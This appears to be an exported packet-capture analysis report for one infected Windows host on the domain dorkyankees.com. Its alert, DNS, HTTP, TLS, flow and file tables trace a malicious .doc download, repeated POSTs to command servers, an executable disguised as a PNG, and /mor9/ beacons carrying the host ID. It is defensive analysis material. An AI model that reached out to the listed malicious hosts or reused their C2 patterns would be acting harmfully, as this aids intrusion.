. . . . . . : No WINS Proxy Enabled. . . . . . . . : No DNS Suffix Search List. . . . . . : dorkyankees.com localdomain Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : localdomain Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection Physical Address. . . . . . . . . : 00-08-02-1C-47-AE DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM Default Gateway . . . . . . . . . : 172.16.1.1 DHCP Server . . . . . . . . . . . : 172.16.1.254 DNS Servers . . . . . . . . . . . : 172.16.1.16 Primary WINS Server . . . . . . . : 172.16.1.1 NetBIOS over Tcpip. . . . . . . . : Enabled .net config workstation Computer name \\DESKTOP-B5JPXN1 Full Computer name DESKTOP-B5JPXN1.dorkyankees.com User name reggie.forsythe Workstation active on .NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE) Software version Windows 10 Pro Workstation domain DORKYANKEES Workstation Dom

2021-01-04T09:09:47.235865-0800

172.16.1.101

103.14.232.46

GPL ATTACK_RESPONSE command completed

2021-01-04T09:05:31.858162-0800

110.39.160.66

172.16.1.101

ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)

2021-01-04T09:07:13.174684-0800

172.16.1.101

158.51.96.25

ET POLICY curl User-Agent Outbound

2021-01-04T09:07:36.508460-0800

172.16.1.101

103.14.232.46

ET POLICY HTTP traffic on port 443 (POST)

2021-01-04T09:07:39.887350-0800

172.16.1.101

103.14.232.46

ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1

Timestamp	2021-01-04T09:08:30.320763-0800
Flow Id	1740526021529519
Source IP	158.51.96.25
Source Port	80
Destination IP	172.16.1.101
Destination Port	65520
Protocol	TCP
Alert Signature	ET POLICY PE EXE or DLL Windows file download HTTP
Alert Category	Potential Corporate Privacy Violation
Alert Severity	1
Alert Gid	1
Alert Signature Id	2018959
Payload Printable	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Mon, 04 Jan 2021 17:07:12 GMT Content-Type: Content-type: application/octet-stream Content-Length: 684117 Connection: keep-alive MZ......................@...............................................!..L.!This program cannot be run in DOS mode. $........<.!.].r.].r.].r.B.r.].r.].r.].r.B.r.].r.6.s.].r.].r-\.raA.r.].r B.rh].r B.r.].rZ[.r.].rRich.].r........PE..L....%._..........................................@........................... ......................................................@.......................P ..O...................................................................................text...-........................... ..`.rdata..............................@..@.data....o.......0..................@....idata...0.......@..................@....rsrc........@......................@..@.reloc...U...P ..`.... .............@..B...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

2021-01-04T09:08:30.320763-0800

158.51.96.25

172.16.1.101

ET POLICY PE EXE or DLL Windows file download HTTP

Timestamp	2021-01-04T09:08:30.320763-0800
Flow Id	1740526021529519
Source IP	158.51.96.25
Source Port	80
Destination IP	172.16.1.101
Destination Port	65520
Protocol	TCP
Alert Signature	ET INFO SUSPICIOUS Dotted Quad Host MZ Response
Alert Category	Potentially Bad Traffic
Alert Severity	2
Alert Gid	1
Alert Signature Id	2021076
Payload Printable	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Mon, 04 Jan 2021 17:07:12 GMT Content-Type: Content-type: application/octet-stream Content-Length: 684117 Connection: keep-alive MZ......................@...............................................!..L.!This program cannot be run in DOS mode. $........<.!.].r.].r.].r.B.r.].r.].r.].r.B.r.].r.6.s.].r.].r-\.raA.r.].r B.rh].r B.r.].rZ[.r.].rRich.].r........PE..L....%._..........................................@........................... ......................................................@.......................P ..O...................................................................................text...-........................... ..`.rdata..............................@..@.data....o.......0..................@....idata...0.......@..................@....rsrc........@......................@..@.reloc...U...P ..`.... .............@..B...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

2021-01-04T09:08:30.320763-0800

158.51.96.25

172.16.1.101

ET INFO SUSPICIOUS Dotted Quad Host MZ Response

DNS 40

Showing 1-20 of 40 items.

Timestamp

Src Ip

Dest Ip

Dns Type

Resource Record Name

Resource Record Type

Resource Data

2021-01-04T09:00:23.374107-0800

172.16.1.101

172.16.1.16

query

nuockhoang.giaodien.vn

(not set)

2021-01-04T09:00:24.608293-0800

172.16.1.16

172.16.1.101

answer

nuockhoang.giaodien.vn

(not set)

2021-01-04T09:00:27.700424-0800

172.16.1.101

172.16.1.16

query

wpad.dorkyankees.com

(not set)

2021-01-04T09:00:27.700652-0800

172.16.1.16

172.16.1.101

answer

wpad.dorkyankees.com

(not set)

2021-01-04T09:00:27.700942-0800

172.16.1.101

172.16.1.16

query

wpad.localdomain

(not set)

2021-01-04T09:00:27.701051-0800

172.16.1.16

172.16.1.101

answer

wpad.localdomain

(not set)

2021-01-04T09:01:02.000178-0800

172.16.1.101

172.16.1.16

query

admintk.com

(not set)

2021-01-04T09:01:02.020608-0800

172.16.1.16

172.16.1.101

answer

admintk.com

(not set)

2021-01-04T09:01:51.220521-0800

172.16.1.101

172.16.1.16

query

97.46.66.173.zen.spamhaus.org

(not set)

2021-01-04T09:01:51.318058-0800

172.16.1.16

172.16.1.101

answer

97.46.66.173.zen.spamhaus.org

(not set)

2021-01-04T09:05:13.310844-0800

172.16.1.101

172.16.1.16

query

cxcs.microsoft.net

(not set)

2021-01-04T09:05:13.393659-0800

172.16.1.16

172.16.1.101

answer

cxcs.microsoft.net

(not set)

2021-01-04T09:06:59.310711-0800

172.16.1.101

172.16.1.16

query

_ldap._tcp.DorkYankees-DC.dorkyankees.com

SRV

(not set)

2021-01-04T09:06:59.310861-0800

172.16.1.16

172.16.1.101

answer

_ldap._tcp.DorkYankees-DC.dorkyankees.com

SRV

(not set)

2021-01-04T09:01:44.604449-0800

172.16.1.101

172.16.1.16

query

wtfismyip.com

(not set)

2021-01-04T09:01:44.674977-0800

172.16.1.16

172.16.1.101

answer

wtfismyip.com

(not set)

2021-01-04T09:01:51.318690-0800

172.16.1.101

172.16.1.16

query

97.46.66.173.cbl.abuseat.org

(not set)

2021-01-04T09:01:51.387900-0800

172.16.1.16

172.16.1.101

answer

97.46.66.173.cbl.abuseat.org

(not set)

2021-01-04T09:01:51.388718-0800

172.16.1.101

172.16.1.16

query

97.46.66.173.b.barracudacentral.org

(not set)

2021-01-04T09:01:51.524792-0800

172.16.1.16

172.16.1.101

answer

97.46.66.173.b.barracudacentral.org

(not set)

TLS 10

Showing 1-10 of 10 items.

Timestamp

Source IP

Destination IP

TLS Version

Server Name Indication

2021-01-04T09:01:02.523780-0800

172.16.1.101

210.56.52.6

TLS 1.2

admintk.com

2021-01-04T09:01:54.452532-0800

172.16.1.101

52.109.8.19

TLS 1.2

nexusrules.officeapps.live.com

2021-01-04T09:03:51.718009-0800

172.16.1.101

52.114.133.60

TLS 1.2

self.events.data.microsoft.com

2021-01-04T09:05:28.172817-0800

172.16.1.101

102.164.208.44

TLSv1

(not set)

2021-01-04T09:06:34.037884-0800

172.16.1.101

102.164.208.44

TLSv1

(not set)

2021-01-04T09:06:37.210748-0800

172.16.1.101

102.164.208.44

TLSv1

(not set)

2021-01-04T09:01:40.925883-0800

172.16.1.101

102.164.208.44

TLSv1

(not set)

2021-01-04T09:05:13.565707-0800

172.16.1.101

184.30.179.191

TLS 1.2

cxcs.microsoft.net

2021-01-04T09:05:13.599729-0800

172.16.1.101

204.79.197.200

TLS 1.2

www.bing.com

2021-01-04T09:05:31.858055-0800

172.16.1.101

110.39.160.66

TLS 1.2

(not set)

TFTP 0

#	Timestamp	Src Ip	Dest Ip	Tftp Packet	Tftp File	Tftp Mode
No results found.

HTTP 17

Showing 1-17 of 17 items.

Timestamp

Source

Hostname

Port

Method

URL

Status

2021-01-04T09:00:27.933525-0800

172.16.1.101

nuockhoang.giaodien.vn

GET

/music-in-hjdnn/0cjbhwlIqxK3QGURHK/

200

2021-01-04T09:01:44.921543-0800

172.16.1.101

wtfismyip.com

GET

/text

200

2021-01-04T09:01:29.118889-0800

172.16.1.101

167.99.105.11

8080

POST

/ghlsmpxrx8v26/cxv1br6ybl/

200

2021-01-04T09:01:22.801707-0800

172.16.1.101

90.160.138.175

POST

/yng1euw6/7uwn5ulz6i2qxe/mf1y7dgndx2t2/

200

2021-01-04T09:01:27.681903-0800

172.16.1.101

90.160.138.175

POST

/4rjfue/cxkz2zw/okonr3br75yqn/

200

2021-01-04T09:01:33.790853-0800

172.16.1.101

90.160.138.175

POST

/eush9g85jy7agywgx/hc8avsoqkt/31a9ky0flz05/el4g0kd8/

200

2021-01-04T09:01:34.490779-0800

172.16.1.101

167.99.105.11

8080

POST

/ijam0wvtbyyg/ogw7/h7bbpwboju6ox4m/2tl7t4nrmnmtu1/ontqyhfgk8yf/

200

2021-01-04T09:01:38.090922-0800

172.16.1.101

90.160.138.175

POST

/60kgv4dkhjsfns/if6r92t3nv/tciwa41cnt/tt3ej3/zplxhaguup9/

200

2021-01-04T09:07:22.285590-0800

172.16.1.101

103.14.232.46

443

POST

/mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90

404

2021-01-04T09:01:41.976876-0800

172.16.1.101

90.160.138.175

POST

/uc2hb4z/qakeq/47rdd53qv22dobuy/0o0qmcmz8fin8pa/o51ddb/enxmvpufu2iggg/

200

2021-01-04T09:01:42.793471-0800

172.16.1.101

90.160.138.175

POST

/009eunxgzk/qcijm/8y79deowgaagx0zsux/

200

2021-01-04T09:08:01.799739-0800

172.16.1.101

103.14.232.46

443

POST

/mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/

404

2021-01-04T09:09:47.235865-0800

172.16.1.101

103.14.232.46

443

POST

/mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90

404

2021-01-04T09:07:16.521386-0800

172.16.1.101

158.51.96.25

GET

/images/picture.png

200

2021-01-04T09:07:39.887350-0800

172.16.1.101

103.14.232.46

443

POST

/mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/

404

2021-01-04T09:09:26.770184-0800

172.16.1.101

103.14.232.46

443

POST

/mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/

404

2021-01-04T09:10:51.830666-0800

172.16.1.101

103.14.232.46

443

POST

/mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/

404

SMB 0

#		Timestamp	Src Ip	Dest Ip	SMB Dialect	Command	Session	Tree
No results found.

SMTP 0

#		Timestamp	Source	Destination	Email From	Email To	Subject
No results found.

Flow 84

Showing 1-20 of 84 items.

Timestamp

Flow Id

Event Type

Source

Source Port

Destination

Destination Port

Protocol

Host

2021-01-04T09:01:18.354400-0800

849822792613524

flow

172.16.1.101

63137

239.255.255.250

1900

UDP

pcapanalyzer

2021-01-04T09:01:18.354400-0800

1438617711654275

flow

172.16.1.101

59199

224.0.0.252

5355

UDP

pcapanalyzer

2021-01-04T09:01:18.354400-0800

1033224338519103

flow

172.16.1.101

5353

224.0.0.251

5353

UDP

pcapanalyzer

2021-01-04T09:01:18.354400-0800

105949489247054

flow

172.16.1.101

137

172.16.1.255

137

UDP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

1267497650351431

flow

172.16.1.101

65519

186.47.209.222

443

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

1692306417285540

flow

172.16.1.101

65507

110.39.160.66

447

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

426100675019879

flow

172.16.1.101

65526

45.141.59.212

443

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

709443959641403

flow

172.16.1.101

54549

172.16.1.16

UDP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

991277567511749

flow

172.16.1.101

65522

103.14.232.46

443

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

1137987206454486

flow

172.16.1.101

65517

172.16.1.16

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

1000107993468106

flow

172.16.1.101

65490

172.16.1.16

135

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

298810704620411

flow

172.16.1.101

65496

167.99.105.11

8080

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

862598191457897

flow

172.16.1.101

65502

204.79.197.200

443

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

18894820940699

flow

172.16.1.101

65508

102.164.208.44

449

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

1006814621206280

flow

172.16.1.101

49153

103.14.232.46

443

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

1572343684605956

flow

172.16.1.101

65503

184.30.179.191

443

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

165514272913997

flow

172.16.1.101

65528

45.141.59.212

443

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

1152227164464953

flow

172.16.1.101

65504

102.164.208.44

449

TCP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

872283329463487

flow

172.16.1.101

61949

172.16.1.16

UDP

pcapanalyzer

2021-01-04T09:10:47.498125-0800

731554425581576

flow

172.16.1.101

50686

172.16.1.16

UDP

pcapanalyzer

File 25

Showing 1-20 of 25 items.

Timestamp

Source

Destination

File Name

File Magic

File Size

2021-01-04T09:00:27.933525-0800

149.28.140.9

172.16.1.101

3XZOWANC98IJF6.doc

Composite Document File V2 Document, Can't read SAT

165719

2021-01-04T09:01:44.921543-0800

207.231.106.130

172.16.1.101

/text

ASCII text

2021-01-04T09:01:27.967445-0800

172.16.1.101

167.99.105.11

XkcbOnEcU

data

3380

2021-01-04T09:01:18.354495-0800

172.16.1.101

90.160.138.175

dhiQwXPPRMuVAkKcMzG

data

3220

2021-01-04T09:01:29.118889-0800

167.99.105.11

172.16.1.101

/ghlsmpxrx8v26/cxv1br6ybl/

data

4132

2021-01-04T09:01:22.801707-0800

90.160.138.175

172.16.1.101

/yng1euw6/7uwn5ulz6i2qxe/mf1y7dgndx2t2/

data

220820

2021-01-04T09:01:22.808143-0800

172.16.1.101

90.160.138.175

jjQEXw

data

1812

2021-01-04T09:01:27.681903-0800

90.160.138.175

172.16.1.101

/4rjfue/cxkz2zw/okonr3br75yqn/

data

405812

2021-01-04T09:01:27.690407-0800

172.16.1.101

90.160.138.175

YIaHfGZ

data

3636

2021-01-04T09:01:33.790853-0800

90.160.138.175

172.16.1.101

/eush9g85jy7agywgx/hc8avsoqkt/31a9ky0flz05/el4g0kd8/

data

474388

2021-01-04T09:01:33.809172-0800

172.16.1.101

90.160.138.175

AkJCAnudHBt

data

3588

2021-01-04T09:01:33.960480-0800

172.16.1.101

167.99.105.11

dXrYJRAgkoMbT

data

3460

2021-01-04T09:01:34.490779-0800

167.99.105.11

172.16.1.101

/ijam0wvtbyyg/ogw7/h7bbpwboju6ox4m/2tl7t4nrmnmtu1/ontqyhfgk8yf/

data

2468

2021-01-04T09:01:38.090922-0800

90.160.138.175

172.16.1.101

/60kgv4dkhjsfns/if6r92t3nv/tciwa41cnt/tt3ej3/zplxhaguup9/

data

285364

2021-01-04T09:01:38.098916-0800

172.16.1.101

90.160.138.175

XsUrtBEemfJGvv

data

1748

2021-01-04T09:07:22.285590-0800

103.14.232.46

172.16.1.101

/mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90

HTML document, ASCII text, with CRLF line terminators

169

2021-01-04T09:01:41.976876-0800

90.160.138.175

172.16.1.101

/uc2hb4z/qakeq/47rdd53qv22dobuy/0o0qmcmz8fin8pa/o51ddb/enxmvpufu2iggg/

data

305764

2021-01-04T09:01:41.987074-0800

172.16.1.101

90.160.138.175

GFklmlvVPtl

data

2564

2021-01-04T09:01:42.793471-0800

90.160.138.175

172.16.1.101

/009eunxgzk/qcijm/8y79deowgaagx0zsux/

DOS executable (COM)

3540

2021-01-04T09:08:01.799739-0800

103.14.232.46

172.16.1.101

/mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/

HTML document, ASCII text, with CRLF line terminators

571

Comments	(not set)

Update Download PCAP Delete